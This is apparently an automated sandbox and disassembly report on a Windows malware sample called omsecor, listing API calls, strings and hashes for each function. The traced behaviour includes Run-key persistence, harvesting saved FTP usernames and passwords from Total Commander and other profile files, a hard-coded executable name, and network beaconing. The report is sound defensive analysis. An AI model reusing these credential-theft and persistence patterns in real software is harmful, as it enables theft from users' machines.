Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
API String ID: 3100629401-2436734164
Opcode ID: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
Opcode Fuzzy Hash: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E

Function 0040782A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
CloseHandle.KERNEL32(00000000), ref: 00407880
GetTickCount.KERNEL32 ref: 00407888

Strings

UniqueNum, xrefs: 00407836

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: File$CloseCountCreateHandleModuleNameTickTime
String ID: UniqueNum
API String ID: 1853814767-3816303966
Opcode ID: ad12cffd4843a03ac357a7cbd35bb16f9c39c4118ba2163eb990dc6e8f3d9bd4
Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
Opcode Fuzzy Hash: ad12cffd4843a03ac357a7cbd35bb16f9c39c4118ba2163eb990dc6e8f3d9bd4
Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB

Function 00407E2B Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 54
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74

Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48

Strings

hOAd, xrefs: 00407E91
d, xrefs: 00407E7E
UniqueNum, xrefs: 00407E38
x, xrefs: 00407E86

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: File$CreateModuleNamePointerRead
String ID: UniqueNum$d$hOAd$x
API String ID: 1528952607-1018652783
Opcode ID: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
Opcode Fuzzy Hash: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE

Function 0040AC20 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 49
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,74DF0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72

Part of subcall function 004069C0: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,75A8E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
Part of subcall function 004069C0: RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED

Strings

/nomove, xrefs: 0040AC23
IueiOod, xrefs: 0040AC50, 0040AC82
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 0040AC39, 0040AC3E, 0040AC6C

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: Open$CloseQueryValue
String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
API String ID: 3546245721-4228964922
Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

Function 0040AAFD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60

Strings

/nomove, xrefs: 0040AB10

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: CharLower$CommandFileLineModuleName
String ID: /nomove
API String ID: 1338073227-1111986840
Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

Function 00407CD7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48

Strings

\merocz.xc6, xrefs: 00407D1B

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: File$CreateCurrentDirectoryModuleName
String ID: \merocz.xc6
API String ID: 3818821825-505599559
Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
Opcode Fuzzy Hash: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA

Function 00407727 Relevance: 6.1, APIs: 4, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000400,74DF0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
GetLastError.KERNEL32(00000004), ref: 004077A9

Part of subcall function 004075D4: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
Part of subcall function 004075D4: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
String ID:
API String ID: 1536607067-0
Opcode ID: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
Opcode Fuzzy Hash: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

Function 004077F0 Relevance: 3.0, APIs: 2, Instructions: 30
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00407800
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?,?,?,00000400), ref: 0040781B

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: CreateProcess_memset
String ID:
API String ID: 1177741608-0
Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5

Function 004069C0 Relevance: 3.0, APIs: 2, Instructions: 25
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,75A8E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

Function 00406D14 Relevance: 3.0, APIs: 2, Instructions: 22
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetAttemptConnect.WININET(00000000), ref: 00406D18
InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406D2C

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: Internet$AttemptConnectOpen
String ID:
API String ID: 2984283330-0
Opcode ID: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
Instruction ID: 3045e06cac02f36cd47ad2bbc893350a3e6c997d3593ce6e368a9b0161d3b649
Opcode Fuzzy Hash: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
Instruction Fuzzy Hash: 04D05E713171312BE7345B763E48ACB2E4CDF02A61701043AF406D8090D6348851C6E8

Non-executed Functions

Function 004039EA Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
StrStrIW.SHLWAPI(?,?), ref: 00403ACF
StrStrIW.SHLWAPI(?,?), ref: 00403AE4
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 00403B20
GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403B36

Strings

default, xrefs: 00403A8B
host, xrefs: 00403A9A
connections, xrefs: 00403A79
SOFTWARE\Ghisler\Total Commander, xrefs: 004039F3
username, xrefs: 00403AA9
ftp://%s:%s@%s, xrefs: 00403B50
password, xrefs: 00403AB8

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: PrivateProfileString$AllocHeap
String ID: SOFTWARE\Ghisler\Total Commander$connections$default$ftp://%s:%s@%s$host$password$username
API String ID: 2479592106-2015850556
Opcode ID: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
Instruction ID: 106d3b010c48b16868dcb071ba678aa04ac33b338b72d514ced31169f03d36dc
Opcode Fuzzy Hash: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
Instruction Fuzzy Hash: A2513D71900109BAEB11EFA5DD41EAEBBBDEF44308F204077E904F6292D775AF068B58

Function 004032B8 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 86libraryloadermemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?,00420840,?,00000000), ref: 00406A8C

Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A

GetSystemMetrics.USER32(00000000), ref: 004032E5
GetSystemMetrics.USER32(00000001), ref: 004032ED
VirtualProtect.KERNEL32(75C50B80,0000000A,00000008,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403309
VirtualProtect.KERNEL32(75C50B88,0000000A,?,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403333
SetUnhandledExceptionFilter.KERNEL32(004032AF,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 0040333A
LoadLibraryW.KERNEL32(atl,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403345
GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377

Strings

AtlAxGetControl, xrefs: 0040336C
AtlAxWinInit, xrefs: 00403357
atl, xrefs: 00403340
AtlAxAttachControl, xrefs: 0040335F

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
API String ID: 3066332896-2664446222
Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79

Function 00408248 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 116sleepfilesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C

FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
Sleep.KERNEL32(00000000), ref: 00408342
Sleep.KERNEL32(00000000), ref: 00408377
FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
FindClose.KERNEL32(00000000), ref: 004083B9

Strings

@@, xrefs: 0040825E
.8@, xrefs: 00408379
.8@, xrefs: 0040833F
., xrefs: 004082CE
., xrefs: 004082B7

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
String ID: .$.$.8@$.8@$@@
API String ID: 2348139788-3828113974
Opcode ID: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
Opcode Fuzzy Hash: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59

Function 0040350F Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 185memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C

HeapAlloc.KERNEL32(00000008,00020002), ref: 00403566
GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
HeapAlloc.KERNEL32(00000008,00000C20), ref: 004035B5
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00403681

Strings

ftp://%s:%s@%s:%u, xrefs: 004036C3
pass, xrefs: 00403611
port, xrefs: 004035F1
user, xrefs: 00403601

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: PrivateProfile$String$AllocHeap$CombinePath
String ID: ftp://%s:%s@%s:%u$pass$port$user
API String ID: 3432043379-2696999094
Opcode ID: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
Opcode Fuzzy Hash: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56

Function 0040CD66 Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0040D0C4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D0D9
UnhandledExceptionFilter.KERNEL32(0040E248), ref: 0040D0E4
GetCurrentProcess.KERNEL32(C0000409), ref: 0040D100
TerminateProcess.KERNEL32(00000000), ref: 0040D107

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
Instruction ID: 078c109d1665b9b830d76e00ceeb27c9797f204ae48b5850d213398ac2e03a3c
Opcode Fuzzy Hash: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
Instruction Fuzzy Hash: 7F21CEB8801244DFD700DF59F945A857BF4BB08385F0086BAE708E76B0E7B458808F0D

Function 00402E3E Relevance: 26.6, APIs: 5, Strings: 10, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C

GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
GetLastError.KERNEL32(?), ref: 00402F4E
GetLastError.KERNEL32 ref: 00403237
GetLastError.KERNEL32(?), ref: 00403258

Strings

From: , xrefs: 004030C8
^key=, xrefs: 0040305E
Via: , xrefs: 004030ED
.html, xrefs: 00402FFE, 004031EE
none, xrefs: 00402F16
file, xrefs: 0040300F
8@, xrefs: 00402FBA
8@, xrefs: 004031AC
4@, xrefs: 00402EF1
^client=, xrefs: 0040301A

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
String ID: .html$4@$8@$8@$From: $Via: $^client=$^key=$file$none
API String ID: 2247176544-2288798624
Opcode ID: 79cd1330f744164cc704132905a94fc592a0dfc2489d9d56cff5d063718bdc77
Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
Opcode Fuzzy Hash: 79cd1330f744164cc704132905a94fc592a0dfc2489d9d56cff5d063718bdc77
Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59

Function 0040B096 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 181threadnetworkCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3

Strings

\netprotdrvss.exe, xrefs: 0040B12D, 0040B293
begun.ru, xrefs: 0040B16A

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
String ID: \netprotdrvss.exe$begun.ru
API String ID: 2887986221-2660752650
